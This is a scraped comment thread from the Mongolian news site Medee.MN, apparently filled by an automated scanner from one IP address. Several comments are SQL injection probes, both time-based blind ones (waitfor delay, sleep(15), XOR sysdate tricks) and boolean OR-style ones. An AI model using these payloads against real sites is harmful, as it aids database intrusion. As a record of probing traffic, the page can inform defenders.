Q4tAfVf0 [196.196.203.214] 2022-07-07 08:58:16

1

1 waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-07 08:58:10

1 [196.196.203.214] 2022-07-07 08:58:03

pHqghUme [196.196.203.214] 2022-07-07 08:58:02

1

-1); waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-07 08:57:57

pHqghUme [196.196.203.214] 2022-07-07 08:57:50

1

-1; waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-07 08:57:45

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ [196.196.203.214] 2022-07-07 08:57:33

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z [196.196.203.214] 2022-07-07 08:57:20

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z [196.196.203.214] 2022-07-07 08:57:09

if(now()=sysdate(),sleep(15),0) [196.196.203.214] 2022-07-07 08:56:56

-1" OR 2+24-24-1=0+0+0+1 -- [196.196.203.214] 2022-07-07 08:56:43

-1' OR 2+625-625-1=0+0+0+1 or 'Z5Hd2BKx'=' [196.196.203.214] 2022-07-07 08:56:43

-1' OR 2+306-306-1=0+0+0+1 -- [196.196.203.214] 2022-07-07 08:56:42

-1 OR 2+902-902-1=0+0+0+1 [196.196.203.214] 2022-07-07 08:56:42

-1 OR 2+703-703-1=0+0+0+1 -- [196.196.203.214] 2022-07-07 08:56:42

uOvcDEg1 [196.196.203.214] 2022-07-07 08:56:41

1 [196.196.203.214] 2022-07-07 08:56:29

1 [196.196.203.214] 2022-07-07 08:56:15

pHqghUme [196.196.203.214] 2022-07-07 08:56:12

1

pHqghUme [196.196.203.214] 2022-07-07 08:56:00

1

Зочин [196.196.203.214] 2022-07-07 08:55:31

1

Зочин [196.196.203.214] 2022-07-07 08:55:28

Зочин [196.196.203.214] 2022-07-07 08:55:18

1

Зочин [196.196.203.214] 2022-07-07 08:55:15

pHqghUme [196.196.203.214] 2022-07-07 08:55:13

1

pHqghUme [196.196.203.214] 2022-07-07 08:55:01

1

Зочин [196.196.203.214] 2022-07-07 08:53:34

Зочин [196.196.203.214] 2022-07-07 08:53:21

Зочин [196.196.203.214] 2022-07-07 08:14:45

1

Зочин [196.196.203.214] 2022-07-07 08:14:45

1

Зочин [196.196.203.214] 2022-07-07 08:14:45

1

Зочин [196.196.203.214] 2022-07-07 08:14:45

1

Зочин [196.196.203.214] 2022-07-07 08:14:45

1

Зочин [196.196.203.214] 2022-07-07 08:14:45

1

Зочин [196.196.203.214] 2022-07-07 08:14:40

Зочин [196.196.203.214] 2022-07-07 08:14:40

Зочин [196.196.203.214] 2022-07-07 08:14:40

Зочин [196.196.203.214] 2022-07-07 08:14:30

1

Зочин [196.196.203.214] 2022-07-07 08:14:30

1

Зочин [196.196.203.214] 2022-07-07 08:14:30

1

Зочин [196.196.203.214] 2022-07-07 08:14:30

1

pHqghUme [196.196.203.214] 2022-07-07 08:13:08

1

pHqghUme [196.196.203.214] 2022-07-07 08:13:08

1

pHqghUme [196.196.203.214] 2022-07-07 08:13:05

1

pHqghUme [196.196.203.214] 2022-07-07 08:13:05

1

pHqghUme [196.196.203.214] 2022-07-07 08:13:05

1

Зочин [196.196.203.214] 2022-07-07 08:13:01

Зочин [196.196.203.214] 2022-07-07 08:13:00


309 сэтгэгдэл байна
1000 тэмдэгт оруулах үлдлээ.
Уншигчдын бичсэн сэтгэгдэлд Medee.MN хариуцлага хүлээхгүй болно. Манай сайт ХХЗХ-ны журмын дагуу зүй зохисгүй зарим үг, хэллэгийг хязгаарласан тул Та сэтгэгдэл бичихдээ бусдын эрх ашгийг хүндэтгэн үзнэ үү.
309 сэтгэгдэл байна
Уншигчдын бичсэн сэтгэгдэлд Medee.MN хариуцлага хүлээхгүй болно. Манай сайт ХХЗХ-ны журмын дагуу зүй зохисгүй зарим үг, хэллэгийг хязгаарласан тул Та сэтгэгдэл бичихдээ бусдын эрх ашгийг хүндэтгэн үзнэ үү.